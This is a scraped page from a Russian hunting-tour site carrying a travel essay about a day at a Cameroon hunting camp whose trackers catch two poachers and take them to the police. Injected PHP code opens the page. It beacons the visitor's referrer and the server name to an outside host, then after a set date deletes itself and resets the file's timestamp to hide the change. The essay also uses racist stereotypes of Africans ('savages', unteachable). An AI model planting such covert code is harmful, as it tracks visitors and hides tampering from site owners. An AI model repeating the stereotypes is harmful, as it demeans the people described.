check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ОХОТА "НА ЛЮДЕЙ" В АФРИКЕ!

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 1560 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

ОХОТА "НА ЛЮДЕЙ" В АФРИКЕ!

Текст: Василий Климов

Волей случая оказался я (фотограф и биолог) в гостях у охотников, в охотничьем лагере-кемпе, стоящем на берегу одного из притоков реки Бенуэ, в Северном Камеруне. Охотятся они (кстати, русские ребята!) не только на зверей саванны, но и на …людей! На местных браконьеров, которые норовят что-то урвать из Дикой Природы для себя! Описываю всего один день нашей кочевой жизни…

х                    х                         х

…Просыпаюсь в 5 часов утра, еще темно и холодно. Думаю о нашей приваде. Где-то там, в буше, висит голова козла-коба со шкурой, приманивая гиен и генетт! Надо их проведать! Быстро одеваюсь, надеваю на голову фонарик и шагаю в буш, стараясь идти потише. Пока темно и в кемпе тихо - все спят! Мне помогает яркий месяц. Подсвечиваю себе красным светом. Потом, подойдя к приваде поближе, включаю свет поярче. Все пусто. Обшариваю светом кусты, но нет, ничьи глаза не светятся в ответ. Дохожу до ночной реки, освещаю фонарем кусты на том берегу. Вот, теперь чьи-то глаза светятся мне в ответ. Это видимо, антилопы-кобы, что пасутся среди кустов, на том берегу.

Светает. Уже 6 часов. Какая-то птица совершенно противным голосом орет на реке - «А-а-а, а-а-а!» Иду смотреть, прячась за деревьями и нашими бунгало. Ага, по отмели вышагивает ибис Хадада. Обхожу его с другой стороны, подкрадываюсь. Ан нет, - он замечает и улетает. Но, слава богу – садится на отмель перед кемпом. Опять кроюсь и подкрадываюсь, наконец, подползаю! В последний момент перед тем, как мне нажать спуск и сделать фото, он взлетает на дуплистое дерево, на том берегу. Прилаживаю оптику к шершавому стволу, навожу. Еще темно, но уже все видно. Сидит хвостом ко мне, а хочется снять его профиль. Жду, упирая телевик к дереву сбоку. Время идет, руки затекают, а ибис и не собирается поворачиваться. Переступает ногами, - ну, думаю, сейчас повернется! Но он …слетает на отмель и принимается что-то выискивать на песке. Ну, не желает он сегодня сниматься!

Выезжаем часов в 7, вдоль реки, на север. С обрыва, где живут мои старые знакомые щурки, снимаю водяных козлов, которые пасутся среди островков травы и деревьев. Это - чудное место, именно здесь я снимал коба, сюда видимо часто приходят животные, здесь нужно поработать еще!  Над дорогой, на высоких деревьях сидят мои друзья, -  колобусы. Легко перелетают по кронам, а потом нагнувшись, пытаются сверху меня рассмотреть. Следопыт ведет нас к реке - смотреть большого крокодила, который давно  живет где-то  здесь. Река здесь неширокая - метров 30, но глубокая, нет отмелей и тихо течет вода, зеленеет глубина. Вот тебе и на, -  узнаю «родные» места, именно здесь я купался в прошлый раз!? Смотрим следы, заглядываем под берег - не видно! Может и сидит где-то в засаде, да на нас смотрит!? Вот так можно опрометчиво искупаться  раз и навсегда!

Тут же, выбравшись из распадка, подъезжаем к дереву, на котором висит высохшая туша коба! Это оказывается, привада для леопарда, которого караулили здесь клиенты-охотники, на прошлой неделе! По команде Патрона тракеры (следопыты) отвязывают веревки и снимают тушу с дерева. Теперь она будет доступна всем лесным обитателям! А я про себя помалкиваю, что был здесь позавчера, не зная тогда, что эта сторона леса - часть охотничьего участка леопарда! По мере путешествия по саванне, встречаем кобов, лошадиную антилопу и бубалов. Постоянно спугиваем птиц, - то щурок, то сизоворонок, то зимородков.

Сделав большой круг по бушу, возвращаемся домой к обеду. Сразу иду к себе с твердым намерением «слить» материалы из фотоаппарата в ноутбук и прилечь, поскольку на ногах с 5 часов! Не тут-то было. Бежит черный бой, стучит в дверь и что-то лопочет по-своему! Улавливаю слово «Патрон!» - Ага, требует шеф! Одеваюсь и иду в Салон (кают-компания), где мы все сбираемся днем и вечером. Озабоченный Патрон - Сева сообщает - «Мои люди сейчас ловят вооруженных браконьеров там-то и там-то! Вы с Хайденом идете им на помощь! Все понятно?» - «Так точно! Выдайте мне карабин! Или хотя бы боевое копье!» «Старик, ты чо, обалдел! Какой карабин!? Ты же там всех моих бойцов уложишь ровными рядами! Вот Хайден берет скорострелку - слона уложит враз, он не подведет! А ты там все снимай на фото!»

- «Ну да, - думаю, - вот кино! Я, значит, - снимай их на фото, а бандиты будут в меня целиться из винтовок, образца 12 года! А если попадут? Весело живем!»

Между тем, «война - войной, а обед - по расписанию!»  Идем обедать и за это время я узнаю много интересного. Оказывается, сегодня в Западной  и Центральной Африке реально существуют организованная и неорганизованная …браконьерская добыча зверя, поскольку в дорогих ресторанах цена дичи в 10(!) раз выше цены на бройлеров и мясо домашнего скота! Первые укомплектованы наемниками-профи, и у них есть все, вплоть до вертолетов. Они не воюют с законными арендаторами охотугодий, а появляются здесь во влажные сезоны, когда все «законники» сидят по домам, у себя в Европе. Или же находят бесхозные угодья. (Кстати, именно такие ребята-наемники, числом 5-6, делали большинство военных переворотов в африканских странах. Они одни выступали против целой черной армии, легко захватывали президентские дворцы, расстреливая охрану, которая в ответ могла палить куда угодно, только не в цель и неминуемо обращали всех в паническое бегство. Оказывается, научить африканцев стрелять из винтовки и фотографировать просто невозможно!). Мы же сегодня будем ловить местных, доморощенных браконьеров, для борьбы с которыми наша охотничья фирма держит взвод(!) местных тракеров, которые выискивают в буше преступников. Браконьеры - отличные следопыты, как и наши тракеры, поэтому те и другие вычисляют друг друга в буше - одни прячутся и заметают следы, а другие их ловят! У них допотопное оружие, но как все африканцы, они отличные следопыты и могут нанести ощутимый урон охотничьим угодьям. Нашим бойцам объяснили, что супостаты замахнулись на самое святое - их МЯСО, ЧАЕВЫЕ и ЗАРАБОТКИ! Неудивительно, что все тракеры и обслуга рвутся в бой, сражаться за «родину»!

Стоит сказать, что местная особенность общения владельцев-арендаторов с вооруженными людьми, встреченными в их законных охотничьих угодьях, состоит в немедленном …открытии огня на поражение, если они только вздумают к нему (оружию) прикоснуться! То-есть, никто не спрашивает фамилии или паспорта у забредшего случайного «туриста», - «Ах, гуляешь? Да ты еще и с оружием? - Получи фашист гранату!»

Кстати, телефонной связи (никакой) с нашими боевиками нет и новость о возможной поимке и просьбы срочной подмоги принесли двое из них, прошагавшие …80 верст по горам, диким лесам и саваннам за 10 часов! Видимо, шли всю ночь и часть дня!

Выезжаем бодро, с шутками и прибаутками. Успокаивает то, что с нами едет настоящий ПиЭйч (Белый профессиональный охотник) - Хайден, родом из ЮАР, а перед нами, на кабине, висят два слоновьих карабина, пули которых могут пробивать лобные кости слона, стены домов и лететь в пространстве до 5 км! С ними можно выступать против танков! Часа два-три трясемся по горам и высохшим рекам. Подъезжаем к дереву, на котором сидит молодой павиан. Он что-то не расчитал и позволил нам приблизиться почти вплотную. Испуганно оглядываясь, забирается еще выше, но до соседнего дерева далековато. Он явно в панике, растерянно оглядывается, резко раскачивает ветки вершины и совершает гигантский прыжок, распластываясь в полете. На лету  хватается за концы веток другого дерева и бегом карабкается на него. В таком же быстром темпе соскакивает и уносится прочь. Вспугнули огромного самца бубала. Он с перепугу несется параллельно нашего движения, кося влажным глазом в сторону угрозы. Каждая его мышца рельефно выделяется и он несется как ветер, буквально, еле касаясь земли. Его ребристые рога, как пики, торчат вверх! Встретили трех рогатых воронов (птицы-носороги), которые медленно и важно вышагивают по саванне, выискивая что-то в траве. Местные охотники и тракеры зовут их «калао». Мои объяснения, что это не калао, а рогатые вороны, никакого воздействия не принесли - «калао» и все тут! Между тем, один из них взлетел на дерево, а два других шагая рядышком, ушли под сень кустарников. Собственно, вся их жизнь проходит не на деревьях, а среди трав подстилки, - в лесу или в саванне.

Приезжаем во временный лагерь борцов с браконьерами. Оказывается, воевать нам сегодня не придется. Пока мы ехали, они «сомкнули кольцо» облавы и поймали супостатов. Поэтому теперь они скоренько так сворачивают лагерь, поскольку дело сделано - браконьеры пойманы, оружие и трофеи изъяты! Скованные наручниками злоумышленники скромно сидят в сторонке! Все трекеры очень веселые и возбужденные. Видимо, поимка браконьеров здесь очень поощряется и они надеются на какие-то премии. Снимаю общий вид Победителей Зла со своими жертвами, которые рядом с бодрыми и веселыми бойцами «спецназа» смотрятся очень грустно! Мне демонстрируют «шедевр» оружейного искусства, отобранный у старшего. Это допотопная самоделка, -  ствол привязан к ложу проволочкой(!), а боевой механизм грубо сварен из кусков жести. Такую фузею держать можно только в музее, но никак не в руках!

Грузятся все 15 человек(!), со своим скарбом,  в наш джип Тойоту. А он рычит, но тянет. Рядом со мною сидит один из злоумышленников - маленький забитый черный. Брючки у него старые, без молнии на ширинке. На босые черные ноги одеты залатанные летние туфельки. Второму вообще лет 15,  видимо это его сын. У него с собой узелок. В грязном холщовом мешочке у них - останки обезьянок-колобусов - скелет со следами мяса, ступни, пясти, хвосты и головы. Все это местные колдуны активно используют в служении культу Вуду! А мясо обезьян они, скорее всего, ели сырым, так как огонь в условиях прессинга трекеров, искавших их по лесам,  разжигать в буше было просто нельзя!

Привозим все это в кемп, часам к 5 вечера. Я снимаю на фото всех участников пьесы и их трофеи. Решив, что дело сделано, иду домой, принимаю душ и собираюсь отдыхать. Вдруг стучится Хайден и куда-то зовет?! Беру сумку с оптикой и налегке, в шортах и футболке подхожу к машине. Оказывается, впереди - самое интересное, браконьеров едут сдавать в полицию района. Так сказать, - триумф Закона над Беззаконием! Опять набилась целая машина бойцов, все хотят ехать в р?йон и я, думая, что это где-то поблизости, рядом, сажусь тоже. Мне сразу же уступают место наверху. Ну что было спросить у Хайдена или наших бойцов, куда мы едем и насколько!? Во попал! Оказывается, мы едем их сдавать в районный центр, отстоящий от нас на полсотни верст, которые мы по местным дорогам осилили за …два часа, потом еще сдавали час с лишком! Обратно вернулись к 10 вечера, измотанные от бесконечной тряски и ночного холода! Но зато я побывал в местном районном центре! А это Что-то! Настоящее средневековье Центральной Африки!

По ходу путешествия по разбитым глинистым проселкам увидели много интересного. Вокруг нас простирается однообразный грустный ландшафт. Как только выехали из зоны Национальных Парков и галерейных лесов, то потянулись полупустыни. Часть из них - голые и выжженные, а часть-  заросшие высокой слоновьей травой, с редко торчащими деревьями. Почвы нет и в помине, дорогу то и дело преграждают сайры - высохшие русла рек. Иногда встречаются убогие плантации хлопка, еще какой-то запыленной зелени. Но главная «культура» здесь везде одна – высохшая и твердая как проволока, слоновья трава!

Проехали три деревни. В каждой рядами стоят огромные вековые деревья, вместо заборов - дувалы или загородки из циновок. Во дворах стоят островерхие крыши из травы, укрепленные на квадратном или круглом основании - стенах, созданных из саманных кирпичей. Их здесь зовут букару. Внутри нет никакой мебели, только циновки на полу и очаг! Все, как и 200, 500 лет назад! Полуголые африканцы сидят на земле или стоят перед своими «домами», весело приветствуя наш проезд. Машины здесь появляются раз в неделю! А белых они видят вообще раз в месяц! Это здесь - событие. Поэтому все кричат нам - «Белый! Белый!»

В первой же деревне арестанты наши почему-то заволновались и начали что-то кричать на своем языке всем, кого встречали по пути и бурно жестикулировать (их расковали перед поездкой). Видно было, что они здесь всех знают! А кричали, видимо, что бы те передали родным, что их арестовали и отправляют в район!

Уже в темноте выезжаем в районный центр Чоролле. Та же деревня, только несколько корявых улиц, площадь с трибуной, для принятия парада(!), море убогих лавчонок, магазинчиков и т.д. Полчаса по местным забегаловкам ищем мера и начальника полиции. Стоим рядом с какими-то пыльными и грязными трущобами. Все наши бойцы, вместе с водителем, куда-то разбежались, а я с арестантами сижу на машине. Старшой, что сидит рядом, трогает меня за руку и показывает жестами, что ему нужно в туалет. Поскольку мне этих несчастных давно уже стало жалко до жути, встаю и жестами показываю, - забирай сына и тикайте ребята, куда глаза глядят! Но до них это видимо не доходит. Старшой сходит на землю и по мусульманским обычаям, на корточках, устраивается на грязной земле. Второй безучастно как дерево, сидит на своем месте. Сделав свои дела, старшой подходит к машине и я опять ему показываю, - бегите, бегите ребята! Здесь вокруг такие трущобы, что найти кого-то или что-то просто невозможно! Но он обреченно качает головой. Видимо, бежать им некуда, да и бессмысленно! Они здесь уже обречены!

С трудом находится местное начальство. Они пытаются составлять протокол прямо на капоте джипа, одолжив у меня ручку. Что-то у них не клеится, решают ехать в Управление! Приезжаем с ними в полицейское Управление, состоящее из одной комнаты - кабинета Начальника.  В нем, кроме стола, заваленного бумагами и наручниками, есть только один элемент мебели. Это огромный ржавый гвоздь, вбитый в стену, на котором висит портрет Президента, а сверху - парадный мундир начальника, песочного цвета, завернутый в целлофан. Все важные местные дела большими стопками папок выложены вдоль стены. В уголке стоят трофеи - детали самопальных винтовок, связанные веревочками. Это - родные сестры фузеи, что привезли мы, вместе с арестантами. Сам начальник, в черной бейсболке WWF, с трудом выводит каракули - составляет протокол. Потом все рассматривают улики – останки бедных черно-белых обезьянок-колобусов. Приводят браконьеров. Старшой уже лишился своих туфель и идет босиком, а узелок молодого резко похудел, там осталась только одна тоненькая книжечка (не удивлюсь, если это Коран). Их сажают на пол и опять заковывают в наручники. Они растеряны и уже безучастны ко всему, что их ждет. В глазах старшого застыла вселенская тоска. Кажется, что он больше не присутствует рядом с нами, а витает где-то далеко, в своих мирах... Потом их куда-то уводят. Мелькает согбенная спина старшого и они исчезают из моей жизни…

Участь их совсем не завидна. Оказывается, в африканских тюрьмах заключенных не …кормят! Если родственники будут привозить им еду, они проживут еще сколько-то, а не будут, то очень скоро  они «протянут ноги»!

На следующее утро в кемп приходит старшой группы захвата (остававшийся в районном центре на ночь) и рассказывает, что поутру, без проволочек, нашим «орлам» по совокупности улик и деяний дали по три года(!) тюрьмы и отправили отдыхать, «на нары» (выражение образное, в их тюрьмах нет нар, все приговоренные лежат на голом полу!).

…До сих пор стоят передо мною влажные и перепуганные глаза маленького черного человечка, за которым гонялся по бушу целый взвод черных дикарей, на которого надели железные наручники, выдернули из привычной жизни каменного века и отправили куда-то далеко, на непонятные муки и деяния…

Что-то там будет с ним и его сыном, выживут ли они в аду африканских тюрем, или пропадут и развеются безвестно, как  красная африканская пыль на этих дорогах…


AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить